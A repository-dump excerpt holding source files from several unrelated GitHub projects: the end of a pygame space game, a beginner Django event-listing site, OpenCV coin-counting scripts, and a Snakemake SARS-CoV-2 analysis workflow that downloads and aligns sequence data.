pygame.display.set_mode([constantes.ANCHO,constantes.ALTO])\n\n agujero = Agujero_negro([0,-100],constantes.DERECHA)\n planeta = Planeta([400,-1200])\n jugador = Jugador([340,620])\n satelite = Satelite([100,100])\n generador_asteroides = Generador_asteroides([50,50])\n\n niveles = [True,True,True]\n en_juego = [True]\n estado = [0]\n\n while en_juego[0]:\n #Pantalla de inicio\n music_intro.set_volume(0.4)\n music_intro.play(-1)\n while (niveles[0] and en_juego[0]):\n for evento in pygame.event.get():\n ambiente.controles(evento,0,en_juego,niveles)\n ventana.blit(PantInit, [0,0])\n ventana.blit(LogoPantInit, [116,150])\n pygame.display.flip()\n music_intro.stop()\n\n #Nivel 1CD\n ambiente.alarma_victoria = False\n elementos_ambientales.add(agujero)\n elementos_ambientales.add(planeta)\n jugadores.add(jugador)\n satelites.add(generador_asteroides)\n satelites.add(satelite)\n utilidades.generar_enemigos(enemigos)\n\n music_juego.set_volume(0.5)\n music_juego.play(-1)\n while (niveles[1] and en_juego[0]):\n for evento in pygame.event.get():\n ambiente.controles(evento,1,en_juego,niveles)\n jugador.controles(evento,balas_jugador)\n ambiente.gestionar_elementos_ambientales(jugador,elementos_ambientales)\n ambiente.gestionar_disparo_enemigo(balas_enemigos)\n ambiente.gestionar_generacion_asteroide(asteroides)\n ambiente.gestionar_generacion_modific_Balas(modificadores)\n ambiente.gestionar_generacion_modific_naves(modificadores)\n elementos_colisionables = [balas_enemigos,enemigos,asteroides,modificadores]\n ambiente.gestionar_colision_jugador(jugador,elementos_colisionables)\n ambiente.gestionar_colision_enemigo(balas_jugador,elementos_colisionables,jugador,ventana)\n elementos_dibujar = [balas_enemigos,balas_jugador,jugadores,enemigos,satelites,elementos_ambientales,asteroides,modificadores]\n elementos_borrar = [balas_enemigos,balas_jugador,elementos_ambientales,satelites,asteroides,modificadores]\n 
ambiente.protector_memoria(elementos_borrar)\n ambiente.ciclo_de_juego(ventana,elementos_dibujar,jugador,niveles,enemigos,jugadores)\n music_juego.stop()\n\n if ambiente.alarma_victoria:\n ambiente.protector_memoria([satelites,elementos_ambientales,modificadores])\n sound_Fireworks1.play(-1)\n sound_Fireworks2.play(-1)\n while (niveles[2] and en_juego[0]):\n for evento in pygame.event.get():\n ambiente.controles(evento,2,en_juego,niveles,jugador,estado)\n ventana.fill(constantes.NEGRO)\n cargar = Victoria[estado[0]]\n ventana.blit(cargar, [0,0])\n ambiente.animar_victoria(ventana)\n pygame.display.flip()\n sound_Fireworks1.stop()\n sound_Fireworks2.stop()\n else:\n #fin de juego\n music_out.set_volume(0.4)\n music_out.play(-1)\n while (niveles[2] and en_juego[0]):\n for evento in pygame.event.get():\n ambiente.controles(evento,2,en_juego,niveles,jugador,estado)\n ventana.fill(constantes.NEGRO)\n cargar = GameOver[estado[0]]\n ventana.blit(cargar, [0,0])\n pygame.display.flip()\n music_out.stop()\n" } ]
21
SuhasKamble/DJEVNT-Django-Project
https://github.com/SuhasKamble/DJEVNT-Django-Project
a7fa1ecd8cddddac81f221b9e6c750020763c699
b180cbad04cf469873868552ebb9db652291b2c5
4894abe0a572518421c010a707869e84c68daa64
refs/heads/master
2023-04-08T10:21:16.194993
2021-04-21T13:54:41
2021-04-21T13:54:41
360,188,320
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4976525902748108, "alphanum_fraction": 0.5751173496246338, "avg_line_length": 21.421052932739258, "blob_id": "76291f67a825bd49087632e1070cb4e2453847c2", "content_id": "aef8f7331f4fac1479444477ea45ab490b78ad5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 426, "license_type": "no_license", "max_line_length": 62, "num_lines": 19, "path": "/home/migrations/0003_event_user.py", "repo_name": "SuhasKamble/DJEVNT-Django-Project", "src_encoding": "UTF-8", "text": "# Generated by Django 3.0.7 on 2021-04-21 03:27\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('home', '0002_auto_20210420_2011'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='event',\n name='user',\n field=models.CharField(default='', max_length=70),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 0.5098591446876526, "alphanum_fraction": 0.5633803009986877, "avg_line_length": 18.72222137451172, "blob_id": "10bbd844f2e8055c880315245534c98d06a3de8f", "content_id": "9e1039db14cb3c453213c1d14fc5e9fa2709800d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 355, "license_type": "no_license", "max_line_length": 47, "num_lines": 18, "path": "/home/migrations/0002_auto_20210420_2011.py", "repo_name": "SuhasKamble/DJEVNT-Django-Project", "src_encoding": "UTF-8", "text": "# Generated by Django 3.0.7 on 2021-04-20 14:41\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('home', '0001_initial'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='event',\n old_name='performer',\n new_name='performers',\n ),\n ]\n" }, { "alpha_fraction": 0.6439751386642456, "alphanum_fraction": 0.644472062587738, "avg_line_length": 34.29824447631836, "blob_id": "2a1efde52a3cb79cd79008cab6491c8450479c4c", "content_id": "9654ff5832e9c1302872ef03d06e2ab4995a065d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4025, "license_type": "no_license", "max_line_length": 125, "num_lines": 114, "path": "/home/views.py", "repo_name": "SuhasKamble/DJEVNT-Django-Project", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, HttpResponse,redirect\nfrom .models import Event\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\n\n\n# Create your views here.\n\ndef home(request):\n allEvents = Event.objects.all()[0:4] \n context = {'allEvents':allEvents}\n \n return render(request,'home/index.html',context)\ndef events(request):\n allEvents = Event.objects.all()\n context = {'allEvents':allEvents}\n return render(request,'home/Events.html',context)\n \n\ndef addEvent(request):\n if request.user.is_authenticated: \n if request.method==\"POST\":\n user = request.user.username\n name = request.POST.get('name')\n performers = request.POST.get('performers')\n venue = request.POST.get('venue')\n address = request.POST.get('address')\n date = request.POST.get('date')\n time = request.POST.get('time')\n image = request.POST.get('image')\n desc = request.POST.get('desc')\n newEvent = Event(user=user,name=name,performers=performers,venue=venue,image=image,date=date,time=time,desc=desc)\n newEvent.save()\n messages.success(request,\"You have successfully added event \")\n return redirect('/')\n\n return 
render(request,'home/AddEvent.html')\n else:\n return HttpResponse(\"User is not authentical\") \n\ndef details(request,slug):\n event = Event.objects.filter(name=slug).first()\n context = {'event':event}\n return render(request,'home/Detail.html',context)\n\n \n return render(request,'home/Detail.html',context)\n\ndef dashboard(request):\n if request.user.is_authenticated:\n allEvents = Event.objects.filter(user=request.user.username)\n context = {'allEvents':allEvents}\n return render(request,'home/Dashboard.html',context)\n else:\n return HttpResponse(\"You are not authenticates\") \n\ndef handleLogin(request):\n if request.method == \"POST\":\n username = request.POST.get(\"username\")\n password = request.POST.get(\"password\")\n user = authenticate(username=username,password=password)\n if user is not None:\n login(request,user)\n messages.success(request,\"You have successgully logged in\")\n return redirect('/')\n \n else:\n messages.error(request,\"Invalid Credentials. Please try again\") \n return redirect('/login') \n \n return render(request,'home/Login.html')\n\ndef handleSignin(request):\n if request.method== \"POST\":\n username = request.POST.get('username')\n email = request.POST.get(\"email\")\n password = request.POST.get('password')\n cpassword = request.POST.get('cpassword')\n if password==cpassword:\n user = User.objects.create_user(username,email,password)\n user.save()\n messages.success(request,\"You have successfully registered \")\n return redirect('/login')\n else:\n messages.error(request,\"Password do not match \") \n return redirect(\"/register\") \n \n \n return render(request,'home/Register.html')\n\ndef handleLogout(request):\n logout(request)\n messages.success(request,\"You have successfully logged out \")\n return redirect(\"/\")\n\ndef editEvent(request,slug):\n event = Event.objects.filter(name=slug).first()\n Event.objects.filter(name=slug).delete()\n context = {'event':event}\n return render(request,'home/AddEvent.html',context)\n\ndef deleteEvent(request,slug):\n Event.objects.filter(name=slug).delete()\n messages.error(request,\"You have successgully deleted a event \")\n return redirect(\"/dashboard\")\n\ndef search(request):\n \n query = request.POST.get('query')\n events = Event.objects.filter(name__icontains=query)\n context = {\"events\":events,'query':query}\n \n return render(request,'home/Search.html',context) " }, { "alpha_fraction": 0.48708009719848633, "alphanum_fraction": 0.5232558250427246, "avg_line_length": 27.66666603088379, "blob_id": "dd5a4c5df5411aac79718cef2fb5e0a8ffa8040c", "content_id": "609c437c3a8bbd32a035acca7471f69a59ee1d9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 774, "license_type": "no_license", "max_line_length": 77, "num_lines": 27, "path": "/home/migrations/0001_initial.py", "repo_name": "SuhasKamble/DJEVNT-Django-Project", "src_encoding": "UTF-8", "text": "# Generated by Django 3.0.7 on 2021-04-20 14:36\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Event',\n fields=[\n ('sno', models.AutoField(primary_key=True, serialize=False)),\n ('name', models.CharField(max_length=200)),\n ('performer', models.CharField(max_length=200)),\n ('venue', models.CharField(max_length=200)),\n ('image', models.CharField(max_length=2000)),\n ('date', models.DateField()),\n ('time', models.TimeField()),\n ('desc', 
models.TextField()),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.6455696225166321, "alphanum_fraction": 0.6781193614006042, "avg_line_length": 30.941177368164062, "blob_id": "e5f7d22ef5b6d36be4ecd6384da998d2b4737fa5", "content_id": "6d0465d85b2c9bc27ae65fb24a1f5c8f2942446f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 553, "license_type": "no_license", "max_line_length": 49, "num_lines": 17, "path": "/home/models.py", "repo_name": "SuhasKamble/DJEVNT-Django-Project", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\nclass Event(models.Model):\n sno = models.AutoField(primary_key=True)\n user = models.CharField(max_length=70)\n name = models.CharField(max_length=200)\n performers = models.CharField(max_length=200)\n venue = models.CharField(max_length=200)\n address = models.CharField(max_length=300)\n image = models.CharField(max_length=2000)\n date = models.DateField()\n time = models.TimeField()\n desc = models.TextField()\n\n def __str__(self):\n return self.name\n \n \n" }, { "alpha_fraction": 0.6918767690658569, "alphanum_fraction": 0.6918767690658569, "avg_line_length": 43.625, "blob_id": "263cfc86f968f17d7dd0e0442728f29447591491", "content_id": "b4e15c5532f1ae1e1586f7c0950c32cfa9646f36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 714, "license_type": "no_license", "max_line_length": 68, "num_lines": 16, "path": "/home/urls.py", "repo_name": "SuhasKamble/DJEVNT-Django-Project", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom django.urls import path\nfrom . import views\nurlpatterns = [\n path('',views.home,name=\"Home\"),\n path('events',views.events,name=\"All Events\"),\n path('addEvent',views.addEvent,name=\"Add Event\"),\n path('dashboard',views.dashboard,name=\"Dashboard\"),\n path('details/<str:slug>',views.details,name=\"Event Details\"),\n path('login',views.handleLogin,name=\"Login\"),\n path('register',views.handleSignin,name=\"Register\"), \n path('logout',views.handleLogout,name=\"Logout\"),\n path(\"edit/<str:slug>\",views.editEvent,name=\"Edit Event\"),\n path(\"delete/<str:slug>\",views.deleteEvent,name=\"Delete Event\"),\n path(\"search\",views.search,name=\"Search Event\"),\n]\n" }, { "alpha_fraction": 0.4243420958518982, "alphanum_fraction": 0.43311402201652527, "avg_line_length": 26.636363983154297, "blob_id": "5546c3393e7914cfb5f08c829aafb52c5c145f64", "content_id": "69b7c307b5f9abebc3a30822170ee671b46720cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 912, "license_type": "no_license", "max_line_length": 80, "num_lines": 33, "path": "/templates/home/index.html", "repo_name": "SuhasKamble/DJEVNT-Django-Project", "src_encoding": "UTF-8", "text": "\n{% extends 'base.html' %}\n{% block title %}\n Home\n{% endblock title %}\n{% block body %}\n <!-- Banner -->\n <div class=\"banner\">\n <h1>Welcome To The Party</h1>\n <h3>Find the hottest DJ event</h3>\n </div>\n \n <!-- Events -->\n <div class=\"events container\">\n <h2>Upcoming Events</h2>\n <div class=\"events-container\">\n {% for event in allEvents %}\n \n <div class=\"event\">\n <div class=\"event-img\">\n <img src=\"{{event.image}}\" alt=\"Event Image\">\n </div>\n <div class=\"event-info\">\n <p>{{event.date}} at {{event.time}}</p>\n <h3>{{event.name}}</h3>\n </div>\n <a href=\"/details/{{event.name}}\" class=\"detail-btn\">Details</a>\n </div>\n \n {% endfor 
%}\n \n </div>\n </div>\n{% endblock body %}" } ]
7
ilkerkuss/OpenCV-Count-and-Detect-Coin
https://github.com/ilkerkuss/OpenCV-Count-and-Detect-Coin
c207649d8dc2fe3e47792de9cfe89134c622f8c4
e39ac9d2d5a0dd3112dca0305933bff5042026c2
e01fc2ddbb0a5e5cbcaffbfd9a1985b51c2a3eed
refs/heads/main
2023-06-15T06:47:21.639000
2021-07-02T18:50:19
2021-07-02T18:50:19
382,436,018
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7059986591339111, "alphanum_fraction": 0.7382992506027222, "avg_line_length": 24.72881317138672, "blob_id": "effdce6f8b214fe1c630d771fae5ccf0c20f47fc", "content_id": "57b40c584b39e245f0fe0f40d553886e83e2e553", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1517, "license_type": "no_license", "max_line_length": 74, "num_lines": 59, "path": "/watershed_segmentation.py", "repo_name": "ilkerkuss/OpenCV-Count-and-Detect-Coin", "src_encoding": "UTF-8", "text": "import numpy as np\nimport cv2 as cv\nimport matplotlib.pyplot as plt\nfrom skimage import color\n\nimg = cv.imread(r\"C:\\Users\\W10\\Desktop\\water_coins.jpg\")\ngray = cv.cvtColor(img,cv.COLOR_BGR2GRAY)\nret, thresh = cv.threshold(gray,0,255,cv.THRESH_BINARY_INV+cv.THRESH_OTSU)\ncv.imshow(\"grey scale\", gray)\ncv.imshow(\"thresh\", thresh)\ncv.waitKey(0)\n\n# noise removal\nkernel = np.ones((3,3),np.uint8)\nopening = cv.morphologyEx(thresh,cv.MORPH_OPEN,kernel, iterations = 2)\ncv.imshow(\"open\", opening)\ncv.waitKey(0)\n\n# sure background area\nsure_bg = cv.dilate(opening,kernel,iterations=3)\ncv.imshow(\"dilate\", sure_bg)\ncv.waitKey(0)\n\n# Finding sure foreground area\ndist_transform = cv.distanceTransform(opening,cv.DIST_L2,5)\nret, sure_fg = cv.threshold(dist_transform,0.7*dist_transform.max(),255,0)\ncv.imshow(\"dist\", dist_transform)\ncv.imshow(\"sure fg\", sure_fg)\ncv.waitKey(0)\n\n# Finding unknown region\nsure_fg = np.uint8(sure_fg)\nunknown = cv.subtract(sure_bg,sure_fg)\n\n\n\ncv.imshow(\"unknown reg\", unknown)\n\ncv.waitKey(0)\n\n# Marker labelling\nret, markers = cv.connectedComponents(sure_fg)\nmarkers = markers.astype(np.int32)\n# Add one to all labels so that sure background is not 0, but 1\nmarkers = markers+1\n# Now, mark the region of unknown with zero\nmarkers[unknown==255] = 0\n\n\nmarkers = markers.astype(np.int32)\nmarkers = cv.watershed(img,markers)\nimg[markers == -1] = [0,0,255]\nimg2=color.label2rgb(markers,bg_label=0)\n\n\ncv.imshow('Segmentated Image',img2)\ncv.imshow(\"thresh\", sure_fg)\ncv.imshow(\"contours\", img)\ncv.waitKey(0)" }, { "alpha_fraction": 0.671832263469696, "alphanum_fraction": 0.716955304145813, "avg_line_length": 29.91549301147461, "blob_id": "3b4357cd6709203cb747dc8286f5886b7405d4ec", "content_id": "29d8b838ecdfc56c130b2c11268a9252c118a359", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2194, "license_type": "no_license", "max_line_length": 125, "num_lines": 71, "path": "/thresholding_segmentation.py", "repo_name": "ilkerkuss/OpenCV-Count-and-Detect-Coin", "src_encoding": "UTF-8", "text": "import numpy as np\nimport cv2\nfrom skimage import filters\n\n\n\nimage=cv2.imread(r\"C:\\Users\\W10\\Desktop\\coin4.jpg\")\n#image = cv2.resize(img,(400,400),interpolation=cv2.INTER_AREA)\ncv2.imshow(\"Original\",image)\ncv2.waitKey(0)\n\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\nblurred = cv2.GaussianBlur(gray,(9,9),0) # blur with standard deviation sigma = 9\ncv2.imshow(\"Blurred\",blurred)\ncv2.waitKey(0)\n\n#Simple edge detection with canny filter\n'''\nedge = cv2.Canny(blurred,30,150) \ncv2.imshow(\"Canny_edged\",edge)\ncv2.waitKey(0)\n'''\n\n#If image need closing operation this codes may use\n'''\nkernel = np.ones((5,5),np.uint8)\nclosed=closing = cv2.morphologyEx(edge, cv2.MORPH_CLOSE, kernel,iterations=1)\ncv2.imshow(\"close\",closed)\ncv2.waitKey(0)\n'''\n\n# Different thresholding operations\n'''\nret,thresh=cv2.threshold(gray, 200, 
255,cv2.THRESH_BINARY_INV)\ncv2.imshow(\"thresh\",thresh)\ncv2.waitKey(0)\n'''\n\nret, thresh2 = cv2.threshold(gray,0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\ncv2.imshow(\"thresh2\",thresh2)\ncv2.waitKey(0)\n\n(cnts,_) = cv2.findContours(thresh2,cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\nprint(\"Belirlenen Madeni Para : {} \".format(len(cnts)))\n\n\ncoins = image.copy()\n\nfor i in range(0,len(cnts)):\n cv2.drawContours(coins,cnts,i,(0,255,0),2)\n cv2.imshow(\"Coins\",coins)\n cv2.waitKey(0)\n\n\n#Show all contoured coins one by one , if u want to see all coins one by one you can uncomment the code lines\n'''\nfor (i, c) in enumerate(cnts):# we are iterating through our contours\n (x, y, w, h) = cv2.boundingRect(c) # x and y are starting point of rectangle in first contours\n\n print(\"Coin #{}\".format(i + 1))\n coin = image[y:y + h, x:x + w] #cropping image as same height and width as the contours\n cv2.imshow(\"Coin\", coin)\n\n mask = np.zeros(image.shape[:2], dtype = \"uint8\") #initialising mask of same height and width as image\n ((centerX, centerY), radius) = cv2.minEnclosingCircle(c) # extracting the centre of circle and radius of the circle\n cv2.circle(mask, (int(centerX), int(centerY)), int(radius),255, -1) #\n mask = mask[y:y + h, x:x + w]\n cv2.imshow(\"Masked Coin\", cv2.bitwise_and(coin, coin, mask = mask)) # finally applying the AND operation on coins using mask\n cv2.waitKey(0)\n'''" }, { "alpha_fraction": 0.795918345451355, "alphanum_fraction": 0.8027210831642151, "avg_line_length": 72.5, "blob_id": "113908b5c17a1538afa130cfeca9d6a16b22b8bf", "content_id": "aa8160e1d67ddfbe90c3351377476fbe706a2171", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 147, "license_type": "no_license", "max_line_length": 115, "num_lines": 2, "path": "/README.md", "repo_name": "ilkerkuss/OpenCV-Count-and-Detect-Coin", "src_encoding": "UTF-8", "text": "# OpenCV Count and Detect Coin\n A program that detects coins with 2 different segmentation ways. It shows all segmented coins and count the coins.\n" } ]
3
nextstrain/ncov-simple
https://github.com/nextstrain/ncov-simple
0f85d57b19a669c2061d8efe8c524615e210ebdf
b91a69424f4d470ada2131c6fae1822c3a7109af
7ebab55ce36160f4f4ea952e9ce7c22c6029c610
refs/heads/master
2023-08-15T01:13:22.579538
2021-10-05T15:24:11
2021-10-05T15:24:11
356,594,441
1
1
null
2021-04-10T13:46:27
2021-05-19T20:28:44
2021-05-19T20:41:03
Python
[ { "alpha_fraction": 0.653915286064148, "alphanum_fraction": 0.6544287800788879, "avg_line_length": 37.939998626708984, "blob_id": "c66fdf4f867481a426e010ac0a740a3af99d1a2b", "content_id": "409f596f249550b08167b671f2c3235bfe29b1b2", "detected_licenses": [ "LicenseRef-scancode-public-domain" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3895, "license_type": "permissive", "max_line_length": 244, "num_lines": 100, "path": "/workflow/snakemake_rules/reference_build.smk", "repo_name": "nextstrain/ncov-simple", "src_encoding": "UTF-8", "text": "'''\nThis part of the workflow downloads reference data sets\n\n - \"reference-datasets/{build_name}/sequences.fasta\"\n - \"reference-datasets/{build_name}/metadata.tsv\"\n\nand combines them with custom data to produce\n\n - builds/{build_name}/sequences.fasta\n - builds/{build_name}/metadata.tsv\n\n'''\nrule prepare_reference_build:\n input:\n sequences = \"builds/{build_name}/sequences.fasta\",\n metadata = \"builds/{build_name}/metadata.tsv\"\n\n\ndef _infer_decompression(input):\n \"\"\"\n Returns a shell command to decompress the piped stream,\n which will itself produce a stream of decompressed data to stdout.\n If no decompression is needed, returns `cat`.\n NOTE: a lot of this will become unnecessary once `augur` handles\n compressed sequence inputs.\n \"\"\"\n if input.endswith(\".xz\"):\n return \"xz -dcq\"\n if input.endswith(\".gz\"):\n return \"gunzip -cq\"\n return \"cat\"\n\n\nrule download:\n message: \"Downloading reference sequences and metadata\"\n output:\n sequences = \"reference-datasets/{build_name}/sequences.fasta\",\n metadata = \"reference-datasets/{build_name}/metadata.fasta\"\n params:\n meta = lambda w: config[\"builds\"][w.build_name][\"reference_metadata\"],\n seq = lambda w: config[\"builds\"][w.build_name][\"reference_sequences\"],\n deflate_seq = lambda w: _infer_decompression(config[\"builds\"][w.build_name][\"reference_metadata\"]),\n deflate_meta = lambda w: _infer_decompression(config[\"builds\"][w.build_name][\"reference_sequences\"])\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n curl {params.meta} | {params.deflate_meta} > {output.metadata:q}\n curl {params.seq} | {params.deflate_seq} > {output.sequences:q}\n \"\"\"\n\n\nrule combine_input_metadata:\n # this rule is intended to be run _only_ if we have defined multiple inputs (\"origins\")\n message:\n \"\"\"\n Combining metadata files {input.ref_metadata} and {input.user_metadata} and adding columns to represent origin\n \"\"\"\n input:\n ref_metadata = rules.download.output.metadata,\n user_metadata = lambda w: config[\"builds\"][w.build_name][\"user_metadata\"]\n output:\n metadata = rules.prepare_reference_build.input.metadata\n log:\n \"logs/combine_input_metadata_{build_name}.txt\"\n benchmark:\n \"benchmarks/combine_input_metadata_{build_name}.txt\"\n run:\n import pandas as pd\n\n ref_meta = pd.read_csv(input.ref_metadata, sep='\\t')\n ref_meta[\"source\"] = \"background\"\n\n user_metadata_files = [input.user_metadata] if type(input.user_metadata)==str else input.user_metadata\n user_metadata = []\n for fname in user_metadata_files:\n tmp = pd.read_csv(fname, sep=None)\n tmp['source'] = \"foreground\"\n user_metadata.append(tmp)\n\n combined_meta = pd.concat([ref_meta]+user_metadata, axis=0).fillna(\"?\").drop_duplicates(subset=\"strain\", keep='first')\n combined_meta.to_csv(output.metadata, sep='\\t')\n\n\nrule combine_sequences:\n # Similar to rule combine_input_metadata, this rule should only be run 
if multiple inputs are being used (i.e. multiple origins)\n message:\n \"\"\"\n Combine and deduplicate aligned & filtered FASTAs from multiple origins in preparation for subsampling: {input}.\n \"\"\"\n input:\n lambda w: [f\"reference-datasets/{w.build_name}/sequences.fasta\"] + ([config[\"builds\"][w.build_name][\"user_sequences\"]] if type(config[\"builds\"][w.build_name][\"user_sequences\"])==str else config[\"builds\"][w.build_name][\"user_sequences\"])\n output:\n rules.prepare_reference_build.input.sequences\n benchmark:\n \"benchmarks/combine_sequences_{build_name}.txt\"\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n python3 scripts/combine-and-dedup-fastas.py --input {input} --output {output}\n \"\"\"\n\n" }, { "alpha_fraction": 0.633582592010498, "alphanum_fraction": 0.6349422335624695, "avg_line_length": 46.45161437988281, "blob_id": "f1aac410308e654c0f31800c4bd8fe248d250be4", "content_id": "d70a289a557b7645b1238cb02f5740fc360cdb15", "detected_licenses": [ "LicenseRef-scancode-public-domain" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1471, "license_type": "permissive", "max_line_length": 131, "num_lines": 31, "path": "/workflow/snakemake_rules/templated_build.smk", "repo_name": "nextstrain/ncov-simple", "src_encoding": "UTF-8", "text": "'''\nThis file generates the build configurations for the templated builds\n'''\n\nfrom itertools import product\n\nfor templated_build in config[\"templated-builds\"].values():\n patterns = templated_build[\"build_patterns\"]\n subsamples = templated_build[\"subsamples\"]\n metadata_adjustments = templated_build.get(\"metadata_adjustments\",{})\n\n for build_vars in product(*[x.items() for x in patterns.values()]):\n build_name_params = {k:v[0] for k,v in zip(patterns.keys(), build_vars)}\n build_params = {k:v[1] for k,v in zip(patterns.keys(), build_vars)}\n build_params.update({k:eval(v.format(**build_params)) for k,v in templated_build.get('subsampling_parameters',{}).items()})\n\n build_name = templated_build[\"build_name\"].format(**build_name_params)\n\n tmp = {}\n for subsample in subsamples:\n tmp[subsample] = {}\n tmp[subsample][\"filters\"] = subsamples[subsample][\"filters\"].format(**build_params)\n if \"priorities\" in subsamples[subsample]:\n tmp[subsample][\"priorities\"] = subsamples[subsample][\"priorities\"].format(**build_params)\n config['builds'][build_name] = {'subsamples': tmp}\n\n tmp = []\n for adjustment in metadata_adjustments:\n tmp.append({\"query\": adjustment[\"query\"].format(**build_params),\n \"src\": adjustment[\"src\"], \"dst\": adjustment[\"dst\"]})\n config['builds'][build_name]['metadata_adjustments'] = tmp\n" }, { "alpha_fraction": 0.5978711843490601, "alphanum_fraction": 0.6021564602851868, "avg_line_length": 32.3317985534668, "blob_id": "11ae798b2ac398260d43d8ad11a7b7d887fa7252", "content_id": "aabf406ba0b9d40f9ede98a6391ad765e04b9b43", "detected_licenses": [ "LicenseRef-scancode-public-domain" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7234, "license_type": "permissive", "max_line_length": 129, "num_lines": 217, "path": "/workflow/snakemake_rules/preprocess.smk", "repo_name": "nextstrain/ncov-simple", "src_encoding": "UTF-8", "text": "'''\nThis part of the workflow downloads files from S3\n\n - \"data/{origin}/sequences.fasta.gz\"\n - \"data/{origin}/metadata.tsv\"\n\nand produces\n\n - pre-processed/filtered.fasta.xz\n - pre-processed/metadata.tsv\n\n'''\n\nimport os\nlocalrules: download_sequences, 
download_metadata, download_exclude\n\nrule preprocess:\n input:\n sequences = \"pre-processed/filtered.fasta.xz\",\n metadata = \"pre-processed/metadata.tsv\",\n sequence_index = \"pre-processed/sequence_index.tsv\"\n\n\n\ndef _infer_decompression(input):\n \"\"\"\n Returns a shell command to decompress the piped stream,\n which will itself produce a stream of decompressed data to stdout.\n If no decompression is needed, returns `cat`.\n NOTE: a lot of this will become unnecessary once `augur` handles\n compressed sequence inputs.\n \"\"\"\n if input.endswith(\".xz\"):\n return \"xz -dcq\"\n if input.endswith(\".gz\"):\n return \"gunzip -cq\"\n return \"cat\"\n\nrule download_sequences:\n message: \"Downloading sequences from {params.address} -> {output[0]}\"\n params:\n address = lambda w: config['origins'][w.origin]['sequences']\n output:\n \"data/{origin}/sequences.fasta.gz\"\n shell: \"aws s3 cp {params.address} {output}\"\n\nrule download_metadata:\n message: \"Downloading metadata from {params.address} -> {output}\"\n params:\n deflate = lambda w: _infer_decompression(config['origins'][w.origin]['metadata']),\n address = lambda w: config['origins'][w.origin]['metadata']\n output:\n metadata = \"data/{origin}/metadata.tsv\"\n shell: \"aws s3 cp {params.address} - | {params.deflate} > {output:q}\"\n\nrule download_exclude:\n message: \"Downloading exclude from {input} -> {output}\"\n output:\n \"data/{origin}/exclude.txt\"\n params:\n source = lambda w: config[\"origins\"][w.origin]['exclude']\n shell: \"curl {params.source} -o {output}\"\n\nrule prealign:\n message:\n \"\"\"\n Aligning sequences to {input.reference}\n - gaps relative to reference are considered real\n \"\"\"\n input:\n sequences = \"data/{origin}/sequences.fasta.gz\",\n genemap = config[\"files\"][\"annotation\"],\n reference = config[\"files\"][\"alignment_reference\"]\n output:\n alignment = \"pre-processed/{origin}/alignment.fasta.xz\",\n insertions = \"pre-processed/{origin}/insertions.tsv\",\n translations = expand(\"pre-processed/{{origin}}/translations/seqs.gene.{gene}.fasta.xz\", gene=config.get('genes', ['S']))\n params:\n outdir = \"pre-processed/{origin}/translations\",\n genes = ','.join(config.get('genes', ['S'])),\n basename = \"seqs\",\n tmp_alignment = \"pre-processed/{origin}/alignment.fasta\",\n deflate = lambda w: _infer_decompression(\".gz\")\n log:\n \"logs/prealign_{origin}.txt\"\n benchmark:\n \"benchmarks/align_{origin}.txt\"\n conda: config[\"conda_environment\"]\n threads: 8\n resources:\n mem_mb=3000\n shell:\n \"\"\"\n {params.deflate} {input.sequences} | nextalign \\\n --jobs={threads} \\\n --reference {input.reference} \\\n --genemap {input.genemap} \\\n --genes {params.genes} \\\n --sequences /dev/stdin \\\n --output-dir {params.outdir} \\\n --output-basename {params.basename} \\\n --output-fasta {params.tmp_alignment} \\\n --output-insertions {output.insertions} &&\\\n xz -2 {params.tmp_alignment} &&\\\n xz -2 {params.outdir}/*fasta\n \"\"\"\n\nrule filter:\n message:\n \"\"\"\n Filtering alignment {input.sequences} -> {output.sequences}\n - excluding strains in {input.exclude}\n - including strains in {input.include}\n \"\"\"\n input:\n sequences = \"pre-processed/{origin}/alignment.fasta.xz\",\n metadata = \"data/{origin}/metadata.tsv\",\n include = \"defaults/include.txt\",\n exclude = \"data/{origin}/exclude.txt\"\n output:\n sequences = \"pre-processed/{origin}/filtered.fasta.xz\"\n log:\n \"logs/filtered_{origin}.txt\"\n benchmark:\n \"benchmarks/filter_{origin}.txt\"\n 
